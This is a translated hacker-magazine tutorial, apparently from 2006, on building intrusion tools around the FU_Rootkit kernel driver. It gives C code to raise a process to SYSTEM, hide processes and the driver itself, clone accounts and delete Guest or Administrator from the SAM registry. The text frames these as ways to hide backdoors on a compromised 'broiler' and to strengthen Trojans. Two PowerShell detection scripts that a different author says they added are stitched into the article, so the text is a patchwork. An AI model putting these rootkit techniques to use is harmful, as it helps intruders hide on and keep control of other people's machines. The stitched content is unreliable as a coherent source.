Kept in seclusion, unknown to the world: FU_Rootkit - vulnerability warning - Black Bar Safety Net

ID MYHACK58:6220068575
Type myhack58
Reporter Anonymous
Modified 2006-04-05T00:00:00


In issue 11 of Hacker Defense (黑防) in 2004 I published the article "A gadget that cleverly deletes the Guest/Administrator accounts", and many friends asked how the tool was written. In fact most of the code in that tool was copied from FU_Rootkit. Since friends like it, and in the past few days I have had a much better idea, I will talk about how to make full use of FU_Rootkit. First go to www.rootkit.com and download FU_Rootkit. Earlier versions had a problem raising process privileges on Windows 2000 Professional; the new version fixes it. FU_Rootkit can be called "kept in seclusion, unknown to the world": compared with Hxdef and AFX RootKit its fame is small, but gold shines in the end, and today we will bring it to light. FU_Rootkit is open source, written in C, and easy to port. My development environment is Windows 2000 + SP4 + VC6.0. The FU_Rootkit program consists of two parts, Fu.exe and Msdirectx.sys: Msdirectx.sys is loaded directly into kernel memory, and Fu.exe is the corresponding user-mode application. First a look at its features:

[-pl] xxx                     enumerate all running processes
[-ph] #PID                    hide the process whose identifier is PID
[-pld]                        list all loaded drivers
[-phd] DRIVER_NAME            hide the named driver
[-pas] #PID                   raise the privileges of the process whose identifier is PID to SYSTEM
[-prl]                        list the available privileges
[-prs] #PID #privilege_name   grant the named privilege to the process whose identifier is PID
[-pss] #PID #account_name     change the token SID of the process whose identifier is PID to that account

As you can see, FU_Rootkit can not only hide processes and drivers and change a process's token and SID, it can also list processes and drivers hidden with Hook techniques. What we are going to do today is use Msdirectx.sys to build our own set of hacking tools. Let's write!
Elevation of privilege

With enough privileges we can do anything we like and make the computer carry out all kinds of functions for us, so the first step is elevation of privilege. We know that the Psu tool can raise a process's privileges; FU_Rootkit can do the same, and it can raise any process to SYSTEM privileges. Not only can it raise other processes, it can also raise our own process to SYSTEM, and in the article below you will see how useful that feature is!

Step one: load Msdirectx.sys. For the code see the InitDriver() function. Friends who understand the code can in fact copy that function over directly.

Step two: find the process PID. In the caller:

    #include <windows.h>
    #include <psapi.h>     // EnumProcesses, EnumProcessModules, GetModuleBaseName (link with psapi.lib)
    #include <string.h>

    DWORD ProcessToPID(const char *InputProcessName);   // defined below

    const char DESTPROC[19] = "UserManager.exe";   // UserManager.exe is the name of our own process
    AddPrivilege(SE_DEBUG_NAME);                   // give our process the DEBUG privilege (helper from the project, not shown here)
    HANDLE hRemoteProcess = NULL;
    DWORD pid = ProcessToPID(DESTPROC);            // pid is now our process's PID

The ProcessToPID function is as follows:

    // Convert a process name into its PID
    DWORD ProcessToPID(const char *InputProcessName)
    {
        DWORD aProcesses[1024], cbNeeded, cProcesses;
        unsigned int i;
        HANDLE hProcess = NULL;
        HMODULE hMod = NULL;
        char szProcessName[MAX_PATH] = "UnknownProcess";

        // Raise our own privileges to include the DEBUG privilege
        AddPrivilege(SE_DEBUG_NAME);

        // Count the current processes; aProcesses[] receives the PIDs of the live processes
        if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
        {
            return 0;
        }
        cProcesses = cbNeeded / sizeof(DWORD);

        // Walk every valid PID
        for (i = 0; i < cProcesses; i++)
        {
            // Open the process with this PID
            hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i]);
            // Fetch the name of the process with this PID
            if (hProcess)
            {
                if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded))
                {
                    GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName));
                    // Compare the name we got with the name asked for; on a match return the PID
                    if (!stricmp(szProcessName, InputProcessName))
                    {
                        CloseHandle(hProcess);
                        return aProcesses[i];
                    }
                }
                CloseHandle(hProcess);   // close the handle for this PID before moving on
            } // end of if (hProcess)
        } // end of for

        // No process with that name was found: return 0
        return 0;
    }

Step three: raise the process privileges to SYSTEM. For the code see the UpdateToSystem() function. Our process UserManager.exe now runs with SYSTEM privileges.

Attack article

Once you have SYSTEM privileges on a broiler, you naturally want to hide your own backdoor process or driver, then clone an account, hide an account and so on. Below we look at how to implement these functions in a program.

1. Clone an account

Friends who have seen the CA tool by Little Tree surely envy it and want to write their own. In issue 7 of Hacker Defense in 2003, the article "Cloning accounts in C" described this in detail. In general there are two ways to clone an account: one uses a system service with SYSTEM privileges to read and write the SAM file; the other uses a driver to raise the process's privileges. Here we take the second approach. In "Cloning accounts in C", because the process did not have SYSTEM privileges, the permissions on the registry's SAM key had to be changed by hand before the key could be operated on, which is more trouble. For us this is of course not a problem: copy its code over and paste it into our project.

2. Hide a process

Hiding a process is the essential self-defence art of Trojans and viruses, and hiding a process is one of FU_Rootkit's most basic functions. First we need to know the process's PID or name; then it can be hidden. The hiding code is as follows:

    DWORD HideProc(DWORD pid)   // pid is the PID of the process to hide
    {
        DWORD d_bytesRead;
        DWORD success;

        // Initialized, gh_Device and IOCTL_ROOTKIT_HIDEME come from FU's own source:
        // the driver must have been loaded and opened by InitDriver() first
        if (!Initialized)
        {
            return ERROR_NOT_READY;
        }
        success = DeviceIoControl(gh_Device, IOCTL_ROOTKIT_HIDEME, (void *)&pid, sizeof(DWORD),
                                  NULL, 0, &d_bytesRead, NULL);
        return success;
    }

If you want to find hidden processes, you can use the RTDector 0.62 tool, which Hacker Defense has already introduced.

3. Hide a driver

Hiding drivers? Very rare. Experienced administrators usually use the command Drivers.exe to view the loaded drivers (Drivers.exe can be found in the Windows 2000 Resource Kit). See Msdirectx.sys exposed? With FU_Rootkit you can hide Msdirectx.sys itself by running the command "C:\fu.exe -phd msdirectx.sys". Of course this feature can also be ported to our program very easily.

Defence article

Don't think the SYSTEM privileges FU_Rootkit gives are only good for attack and useless for defence. A rootkit is a "double-edged sword": used properly, it is also a good helper for defence. And for a rookie like me, defence naturally comes first, so let's look at defence.

1. System user view

Open any hacking magazine these days and you see "hidden accounts", "dead accounts" and the like, which scare rookies like me into staring at User Management in a daze: what exactly is the problem? Here we can use LPUSER_INFO_3 to read the user information, including user name, full name, description, number of logons, logon permissions, last logon time and other parameters. The code is long but simple, so it is not posted here; anyone interested can look at the DWORD CUserManagerDlg::UserALLE() function. Of course, you can also read the account names directly from SAM\\SAM\\Domains\\Account\\Users\\Names and compare them with the accounts read through LPUSER_INFO_3. That way you can find the hidden accounts, and restore the hidden and the "dead" ones to their original form, so that you see the accounts "clearly and plainly".

2. Delete Guest

First let's see how to delete the Guest user. Once we have SYSTEM privileges, deleting the Guest and 000001F5 subkeys under the SAM key in the registry is all it takes!

    void CUserManagerDlg::Deleteguest()
    {
        BOOL upResult;
        upResult = UpdateToSystem();   // first raise the process to SYSTEM and check whether it succeeded
        if (upResult)                  // elevation to SYSTEM succeeded
        {
            // Delete the GUEST user!
            BOOL dResult;
            dResult = DelNT(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\Names\\Guest");   // delete the Guest subkey
            BOOL dResult2;
            dResult2 = DelNT(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\000001F5");      // delete the 000001F5 subkey, the ID number belonging to Guest
            if (dResult && dResult2)
            {
                AfxMessageBox("Successfully deleted the GUEST user!");
            }
            else
            {
                AfxMessageBox("Deleting the GUEST user failed!");
            }
        }
        else
        {
            AfxMessageBox("Elevating to SYSTEM privileges failed!");
        }
    }

Here DelNT() is a function defined specifically to delete a registry subkey.

3. Delete Administrator

Don't be startled by the title: Administrator normally cannot be deleted. Of course you can rename the account under Control Panel -> Administrative Tools -> Computer Management, and you can also use the Passprop tool from the NT Resource Kit to enable lockout of Administrator. Here we of course take on the ultimate challenge: delete Administrator! The code is almost the same as the code for deleting Guest; only the parameters differ: delete the Administrator and 000001F4 subkeys under the registry's SAM key. It can even be removed while Administrator is the current user. Strong, eh? If you only have one administrator account... sorry, and congratulations: your machine no longer has an administrator!

Tip: it is strongly recommended that before deleting Administrator you first create an administrator account under another name. According to Microsoft's information security proceedings, deleting the built-in Administrator and Guest accounts may corrupt the SAM database, but the author of that text also stated that in his tests he found no side effects.
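The check described in section 1 above, comparing the account names under the SAM Names key with what the user-management API reports, as an added PowerShell example; this is my code, not the article's UserManager tool and not part of FU_Rootkit. It assumes Windows PowerShell 5.1 (for Get-LocalUser, which returns the same account list the article reads through LPUSER_INFO_3) and a SYSTEM context, because by default only SYSTEM can read the SAM hive; the function names are my own.

```powershell
# Added example (not from the article): cross-check the SAM Names subkeys against
# the account list returned by the API. An account present in SAM but missing
# from the API view is a "hidden account" in the article's sense.

function Test-RunningAsSystem {
    # S-1-5-18 is the well-known SID of LocalSystem
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    return ($id.User.Value -eq 'S-1-5-18')
}

function Get-SamAccountNames {
    # Every subkey of ...\Users\Names is one local account, whether the API shows it or not
    $namesKey = 'HKLM:\SAM\SAM\Domains\Account\Users\Names'
    return @(Get-ChildItem -Path $namesKey | ForEach-Object PSChildName)
}

function Get-ApiAccountNames {
    # The same data LPUSER_INFO_3 / NetUserEnum returns, via the LocalAccounts module
    return @(Get-LocalUser | ForEach-Object Name)
}

function Compare-AccountViews {
    if (-not (Test-RunningAsSystem)) {
        throw 'Run as SYSTEM (for example from a scheduled task or PsExec -s); the SAM hive is not readable otherwise.'
    }
    $sam = Get-SamAccountNames
    $api = Get-ApiAccountNames
    # -notcontains is case-insensitive, matching how SAM treats account names
    foreach ($name in $sam) {
        if ($api -notcontains $name) {
            [pscustomobject]@{ Account = $name; Finding = 'in SAM Names but not reported by the API: hidden or damaged account' }
        }
    }
    foreach ($name in $api) {
        if ($sam -notcontains $name) {
            [pscustomobject]@{ Account = $name; Finding = 'reported by the API but missing from SAM Names' }
        }
    }
}

Compare-AccountViews | Format-Table -AutoSize
```

No output means the two views agree. Any row is a lead, not a verdict: confirm it by inspecting the matching RID subkey under SAM\SAM\Domains\Account\Users before deleting anything, since, as the article's own tip notes, edits to the SAM keys are not reversible without a backup.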

4. Killing processes

Friends often run into this situation: Task Manager shows an unknown process, but it cannot be killed because the permissions are insufficient. Once we have obtained SYSTEM privileges this is no longer a problem. Nowadays viruses and Trojans usually run as a pair of processes that guard each other, which makes killing them very inconvenient, so we need to be able to kill several processes at once. A ListView control with the Checkbox option selected is used as the process list, so that several processes can be selected and killed at the same time. Cool, right?!

5. Listing processes and drivers hidden with Hook techniques

This is where FU_Rootkit excels: it can help you find processes and Trojans hidden with HOOK techniques. The implementation is relatively simple; see the ListProc(void *buffer, int buff_size) and ListDriv(void) functions in the source code.
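The cross-view check behind sections 2 and 5 (a hidden process is found by comparing two views that disagree), as an added PowerShell example that is not part of the article or of FU_Rootkit. FU hides a process by unlinking it from the kernel's list of active processes (a detail of FU the article does not spell out); enumeration APIs such as the one behind Get-Process walk that list, while opening a process by PID is resolved through the kernel's process-ID table, which the unlinking leaves alone. The script probes every candidate PID with OpenProcess and reports any PID that exists but is absent from Get-Process; the function names and the PID ceiling heuristic are my choices.

```powershell
# Added example, not part of the article or of FU_Rootkit: cross-view detection of
# a process unlinked from the kernel's active-process list (what FU's -ph does).
# View 1: Get-Process (NtQuerySystemInformation) walks that list.
# View 2: OpenProcess by PID goes through the process-ID table, so a hidden
#         process still opens (or returns ERROR_ACCESS_DENIED, which also proves it exists).

Add-Type -Namespace Win32 -Name Kernel32 -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
'@

# PROCESS_QUERY_LIMITED_INFORMATION (Vista and later); on the article's Windows 2000
# the equivalent right is PROCESS_QUERY_INFORMATION = 0x0400.
$PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
$ERROR_ACCESS_DENIED = 5

function Get-ProbeViewPids {
    # Probe every candidate PID. PIDs are multiples of 4; 0 is Idle and 4 is System.
    param([int]$MaxPid = 65536)
    $highestVisible = (Get-Process | Measure-Object -Property Id -Maximum).Maximum
    # Heuristic ceiling (my choice): at least MaxPid, or twice the highest visible PID
    $ceiling = [int][Math]::Max($MaxPid, 2 * $highestVisible)
    $found = New-Object System.Collections.Generic.List[int]
    for ($candidate = 4; $candidate -le $ceiling; $candidate += 4) {
        $h = [Win32.Kernel32]::OpenProcess($PROCESS_QUERY_LIMITED_INFORMATION, $false, $candidate)
        if ($h -ne [IntPtr]::Zero) {
            [void][Win32.Kernel32]::CloseHandle($h)
            $found.Add($candidate)
        } elseif ([Runtime.InteropServices.Marshal]::GetLastWin32Error() -eq $ERROR_ACCESS_DENIED) {
            # The process object exists even though we may not open it
            $found.Add($candidate)
        }
        # Any other error (ERROR_INVALID_PARAMETER) means no process owns this PID
    }
    return $found
}

function Find-HiddenProcess {
    # Sample the API view before and after the probe so that processes which start
    # or exit during the scan are not reported as hidden
    $apiBefore = @(Get-Process | ForEach-Object Id)
    $probeView = @(Get-ProbeViewPids)
    $apiAfter  = @(Get-Process | ForEach-Object Id)
    $apiView   = @($apiBefore + $apiAfter) | Sort-Object -Unique
    foreach ($candidatePid in $probeView) {
        if ($apiView -notcontains $candidatePid) {
            [pscustomobject]@{
                Pid     = $candidatePid
                Finding = 'opens by PID but is absent from the process list (possible unlinked process)'
            }
        }
    }
}

Find-HiddenProcess | Format-Table -AutoSize
```

Run it twice before treating a PID as hidden: a process that starts or exits mid-scan can show up once. The probe only catches list unlinking; a rootkit that also hooks the open-by-PID path would pass it, which is why tools such as the RTDector the article mentions combine several views, and the same idea applies to drivers by comparing the loaded-driver list with what the service control manager believes it started.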

This article has used FU_Rootkit to obtain SYSTEM privileges and then built a number of practical little hacking gadgets. SYSTEM and Administrator privileges look and feel similar in general, but in some details of interaction with the system kernel, for example read and write access to certain registry keys and to physical memory, SYSTEM can be seen to be the larger. So what can be done with SYSTEM privileges goes far beyond what we have covered above, and I hope everyone will dig into it together. There are many good open-source resources available; research them and extend their functionality and you can write a lot of useful small software. Adding these functions to our little Trojan will greatly improve its vitality. Friends, doesn't it now feel as if hacking software is something anyone can write? If so, it was worth the effort I spent typing this up. Because of work my time really is limited, so it was impossible to implement every function above in the code; it is in fact already manual labour, and many features only need the code copied in. The small tool for deleting Guest/Administrator and the FU_Rootkit code are attached; friends who upgrade it, please send me a copy!